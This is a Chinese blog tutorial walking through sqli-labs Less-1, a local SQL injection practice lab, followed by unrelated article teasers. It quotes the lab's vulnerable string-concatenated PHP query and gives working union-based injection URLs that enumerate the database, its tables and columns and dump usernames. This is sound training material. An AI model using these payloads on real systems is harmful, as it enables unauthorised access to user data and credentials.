当前位置：首页 > news >正文

sql-labs-Less1

news 2025/6/26 9:06:31

靶场搭建好了，访问题目路径

http://127.0.0.1/sqli-labs-master/Less-1/

我最开始在做sql-labs靶场的时候很迷茫，不知道最后到底要得到些什么，而现在我很清楚，sql注入可以获取数据库中的信息，而获取信息就是我们的目标

我作为一个初学者，我跟喜欢跟着源码分析思路，所以这里我贴出源码，分析一下

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){echo "<font size='5' color= '#99FF00'>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "</font>";echo "<br>";echo '执行的sql语句为：'.$sql;echo '<br/>';echo '<br/>';}else {echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>";  }
}else { echo "Please input the ID as parameter with numeric value";}

下面的语句是正常执行的sql语句

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

当我们更改url为下面的时候

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

此刻我们也就是正常的在users中查询id=1的用户，而此刻前端也就会显示账号和密码

由于我们审计代码发现只要是sql语句都可以执行，但是我们直接在id处书写语句是不符合sql语句的规范的，这样我们就必须想一个办法让前面的查询id可以正常执行，同时再执行其他的语句，那么这里我们就需要用到联合查询了。

联合查询

联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表，从而实现将两个表的查询组合到一起，使用谓词为UNION或UNION ALL。

首先我们先闭合前面对id查询的语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ ——+

我们先是使用'将前面的id查询闭合起来，接着使用--+注释后端的 LIMIT 0,1

SELECT * FROM users WHERE id='1' --+' LIMIT 0,1

在联合查询注入之前要做一件很重要的事，那就是找到回显点，而回显点的个数就需要order by来查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4--+

当by后的数字为3时不报错，但是改为4的时候却产生报错

这就证明我们有三处回显位置,这时候我们就可以大胆的使用联合查询了

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,database() --+

这里我把id的值赋为0是为了联合查询的特性，前端生肖，那么就执行后端的sql语句

查询security内的所有表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

group_concat

将组中的字符串连接所有非NULL的字符串，如果没有非Null的字符串，那么它就会返回Null

information_schema.tables

information_schema.tables存储了数据表的元数据信息

table_schema

table_schema 是数据库的名称

查表里有什么以users表为例

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

查看字段里的内容（以username里面的内容为例）

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,database(), group_concat(username) from users --+

sql-labs-Less1

靶场搭建好了，访问题目路径 http://127.0.0.1/sqli-labs-master/Less-1/ 我最开始在做sql-labs靶场的时候很迷茫，不知道最后到底要得到些什么，而现在我很清楚，sql注入可以获取数据库中的信息，而获取信息就是我们的目标…...

编程日记 2023/2/28 17:01:54

又一个国内类ChatGPT模型？【秘塔科技上线自研LLM大模型「对话写作猫」】

又一个国内类ChatGPT模型？【秘塔科技上线自研LLM大模型「对话写作猫」】说个题外话，今天一大早就收到了Biying的邮件。前段时间不是申请了New Biying的内测吗？下午可以尝试一下玩一会儿。如果体验感还不错或者还有很多bug，那我到…...

编程日记 2023/2/28 17:00:46

卷麻了，00后测试用例写的比我还好，简直无地自容......

经常看到无论是刚入职场的新人，还是工作了一段时间的老人，都会对编写测试用例感到困扰？例如： 如何编写测试用例？ 作为一个测试新人，刚开始接触测试，对于怎么写测试用例很是头疼，无法…...

编程日记 2023/2/28 16:59:33

动态网页的核心——JSP

文章目录1，JSP 概述2，JSP 小案例2.1 搭建环境2.2 导入 JSP 依赖2.3 创建 jsp 页面2.4 编写代码2.5 测试3，JSP 原理4，JSP 总结4.1 JSP的缺点4.2技术的发展历程4.3JSP的必要性最后说一句1，JSP 概述 JSP（全称…...

编程日记 2023/2/28 16:58:26

RK3588平台开发系列讲解（系统篇）init.d介绍

平台内核版本安卓版本RK3588Linux 5.10Android 12文章目录一、Linux启动简介二、sysvinit配置三、inid.d介绍沉淀、分享、成长，让自己和他人都能有所收获！😄 📢本篇介绍init.d相关知识。一、Linux启动简介 Linux用户空间启动时，第一个会启动init进程，用来引导启动其…...

编程日记 2023/2/28 16:57:18

taobao.user.buyer.get( 查询买家信息API )

￥开放平台基础API必须用户授权查询买家信息API，只能买家类应用调用。公共参数请求地址: HTTP地址 http://gw.api.taobao.com/router/rest 公共请求参数: 公共响应参数: 请求参数响应参数点击获取key和secret 请求示例 TaobaoClient client new…...

编程日记 2023/2/28 16:56:09

python学生信息管理系统

wx供重浩：创享日记对话框发送：python学生信息免费获取完整源码源文件配置教程说明等在IDLE中运行《学生信息管理系统》即可进入如图1所示的系统主界面。在该界面中可以选择要使用功能对应的菜单进行不同的操作。在选择功能菜单时，有两种方…...

编程日记 2023/2/28 16:55:00

【微信小程序】-- WXML 模板语法 - 条件渲染 -- wx:if hidden （十一）

💌 所属专栏：【微信小程序开发教程】 😀 作者：我是夜阑的狗🐶 🚀 个人简介：一个正在努力学技术的CV工程师，专注基础和实战分享 ，欢迎咨询！ &…...

编程日记 2023/2/28 16:53:51

2023上半年软考，广州/东莞/深圳/江苏报班是明智的选择

软考是全国计算机技术与软件专业技术资格（水平）考试（简称软考）项目，是由国家人力资源和社会保障部、工业和信息化部共同组织的国家级考试，既属于国家职业资格考试，又是职称资格考试。系统集成…...

编程日记 2023/2/28 16:52:40

C++修炼之练气期一层——命名空间

目录 1.引例 2.命名空间的定义 3.命名空间的使用 4.命名空间使用注意事项 1.引例 #include <stdio.h> #include <stdlib.h>int rand 10;int main() {printf("%d\n", rand);return 0; } 当我们用C语言写下这样的代码，看着并没有什么语法…...

编程日记 2023/2/28 16:51:30

matplotlib综合学习

1.arange函数arange函数需要三个参数，分别为起始点、终止点、采样间隔。采样间隔默认值为1看例子： import numpy as np #import matplotlib.pyplot as plt xnp.arange(-5,5,1) print(x)2.绘制sin(x)曲线import numpy as np import matplotlib.pyplot as …...

编程日记 2023/2/28 16:50:20

IIS .Net Core 413错误和Request body too large解决办法

错误描述图片比较大时，在前端上传就报413错误。根本到不了后端。在网上看到这个文章比较有用。https://blog.csdn.net/wstever/article/details/1288707421、修改网站Web.config配置文件加入下面这段配置<?xmlversion"1.0" encoding"utf-8"…...

编程日记 2023/2/28 16:49:07

Spring Boot数据访问—（springboot 多数据源）—官方原版

Spring Boot 包含许多用于处理数据源的启动器，本文回答与执行此操作相关的问题。一、配置自定义数据源要配置自己的DataSource，请在配置中定义该类型的Bean。Spring Boot在任何需要的地方重用DataSource，包括数据库初始化。如果需要外部化某些…...

编程日记 2023/2/28 16:47:57

高燃！GitHub上标星75k+超牛的Java面试突击版

前言不论是校招还是社招都避免不了各种面试。笔试，如何去准备这些东西就显得格外重要。不论是笔试还是面试都是有章可循的，我这个有章可循‘说的意思只是说应对技术面试是可以提前准备。运筹帷幄之后，决胜千里之外!不打毫无准备的仗,我觉得大…...

编程日记 2023/2/28 16:46:42

grid宫格布局新手快捷上手-f

前言 grid 网上有很多，但都是大而全的，感觉新人上手很吃力，本文仅以最快捷的方式进行介绍，如何使用grid宫格布局本文是新人上手，若想了解更多grid布局，请阅读其他文章使用声明布局 display: grid;声…...

编程日记 2023/2/28 16:45:17

part1 – https://blog.csdn.net/qq_41080854/article/details/129204480 part2 – https://blog.csdn.net/qq_41080854/article/details/129224785 面试必刷101 Java题解 -- part 3动规五部曲71、斐波那契数列72、跳台阶73、最小花费爬楼梯74、最长公共子序列(二)75、最长公共…...

编程日记 2023/2/28 16:44:01

干货满满！MES的简介和运用

导读谈及MES必须先谈生产，生产体系模型如图所示，涉及人、财、物、信息等资源，产、供、销等环节，以及供应商、客户、合作伙伴等。其中，生产管理是通过对生产系统的战略计划、组织、指挥、实施、协调、控制等活动&…...

编程日记 2023/2/28 16:42:52

【ElasticSearch系列-01】初识以及安装elasticSearch

elasticSearch入门和安装一，elasticSearch入门1，什么是elasticSearch2，elasticSearch的底层优点2.1，全文检索2.2，倒排索引2.2.1，正排索引2.2.2，倒排索引2.2.3，倒排索引解决的问题2.2…...

编程日记 2023/2/28 16:41:45

【Leedcode】栈和队列必备的面试题（第一期）

栈和队列必备的面试题（第一期） 文章目录栈和队列必备的面试题（第一期）一、题目二、思路（图解）三、存在的问题与隐患（报错提示）（1）s中只有右括号，无…...

编程日记 2023/2/28 16:40:35

Unity 渲染流程管线

渲染流程图可以把它理解为一个流程，就是我们告诉GPU一堆数据，最后得出来一副二维图像，而这些数据就包括了”视点、三维物体、光源、照明模型、纹理”等元素。参考如下图(来自视频)CPU应用阶段剔除视锥剔除由Unity依据Camera直接完成&#xff…...

编程日记 2023/2/28 16:39:24

大型活动交通拥堵治理的视觉算法应用

大型活动下智慧交通的视觉分析应用一、背景与挑战大型活动（如演唱会、马拉松赛事、高考中考等）期间，城市交通面临瞬时人流车流激增、传统摄像头模糊、交通拥堵识别滞后等问题。以演唱会为例，暖城商圈曾因观众集中离场导致周边…...

编程新知 2025/6/26 0:24:29

centos 7 部署awstats 网站访问检测

一、基础环境准备（两种安装方式都要做） bash # 安装必要依赖 yum install -y httpd perl mod_perl perl-Time-HiRes perl-DateTime systemctl enable httpd # 设置 Apache 开机自启 systemctl start httpd # 启动 Apache二、安装 AWStats&#xff0…...

编程新知 2025/6/23 7:43:52

渲染学进阶内容——模型

最近在写模组的时候发现渲染器里面离不开模型的定义，在渲染的第二篇文章中简单的讲解了一下关于模型部分的内容，其实不管是方块还是方块实体，都离不开模型的内容 🧱 一、CubeListBuilder 功能解析 CubeListBuilder 是 Minecraft Java 版模型系统的核心构建器，用于动态创…...

编程新知 2025/6/21 3:27:34

2025 后端自学UNIAPP【项目实战：旅游项目】6、我的收藏页面

代码框架视图 1、先添加一个获取收藏景点的列表请求【在文件my_api.js文件中添加】 // 引入公共的请求封装 import http from ./my_http.js// 登录接口（适配服务端返回 Token） export const login async (code, avatar) > {const res await http…...

编程新知 2025/6/20 11:39:49

Psychopy音频的使用

Psychopy音频的使用本文主要解决以下问题： 指定音频引擎与设备；播放音频文件本文所使用的环境： Python3.10 numpy2.2.6 psychopy2025.1.1 psychtoolbox3.0.19.14 一、音频配置 Psychopy文档链接为Sound - for audio playback — Psy…...

编程新知 2025/6/21 18:09:34

ardupilot 开发环境eclipse 中import 缺少C++

目录文章目录目录摘要1.修复过程摘要本节主要解决ardupilot 开发环境eclipse 中import 缺少C++，无法导入ardupilot代码，会引起查看不方便的问题。如下图所示 1.修复过程 0.安装ubuntu 软件中自带的eclipse 1.打开eclipse—Help—install new software 2.在 Work with中…...

编程新知 2025/6/25 22:08:54

用docker来安装部署freeswitch记录

今天刚才测试一个callcenter的项目，所以尝试安装freeswitch 1、使用轩辕镜像 - 中国开发者首选的专业 Docker 镜像加速服务平台编辑下面/etc/docker/daemon.json文件为 {"registry-mirrors": ["https://docker.xuanyuan.me"] }同时可以进入轩…...

编程新知 2025/6/22 1:36:54